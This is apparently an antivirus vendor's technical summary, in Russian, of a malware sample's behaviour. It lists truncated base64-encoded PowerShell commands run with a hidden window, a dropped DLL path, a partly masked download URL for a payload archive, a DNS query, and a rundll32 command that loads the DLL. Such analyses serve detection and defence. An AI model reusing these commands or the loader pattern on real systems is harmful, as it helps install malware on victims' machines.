Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABpAFcAUwB6AHQAIAA9AFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBzAHQAZQBNAC4ASQBvAC4AJwAsACcAWQAnACwAJwBEAGkAUgBlAGMAdAAnACwAJwBPAFIAJw...
- %HOMEPATH%\e93xt11\lt00ebt\fre2rje.dll
- http://re######packersmovers.com/k5uzrb.rar
- DNS ASK re######packersmovers.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABpAFcAUwB6AHQAIAA9AFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBzAHQAZQBNAC4ASQBvAC4AJwAsACcAWQAnACwAJwBEAGkAUgBlAGMAdAAnACwAJwBPAFIAJw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\E93xt11\Lt00ebt\Fre2rje.dll 0